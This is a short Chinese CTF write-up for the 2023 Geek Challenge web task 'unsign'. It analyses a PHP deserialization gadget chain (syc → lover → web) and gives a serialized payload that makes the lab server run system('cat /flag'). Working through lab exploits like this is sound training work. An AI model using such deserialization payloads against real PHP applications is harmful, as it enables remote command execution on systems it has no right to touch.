返回
1
0

极客大挑战2023-web-unsign WP -

Sonetto,2026-06-03 23:40

PHP 反序列化靶场

源码分析:
入口是 unserialize($_POST['url']),定义了三个类,构成一条调用链。

调用链分析:

魔法方法

触发条件

行为

syc

__destruct()

对象销毁

调用 $this->cuit()

lover

__invoke()

对象被作为函数调用

访问 $this->yxx->QW,触发 __get

web

__get()

访问不可访问属性

执行 eva1(eva1($eva1($this->interesting)

完整链: syc::__destruct()lover::__invoke()web::__get()system("cat /flag")

Payload:

Plaintext
O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:9:"cat /flag";}s:2:"QW";N;}}
暂无回复。你的想法是什么?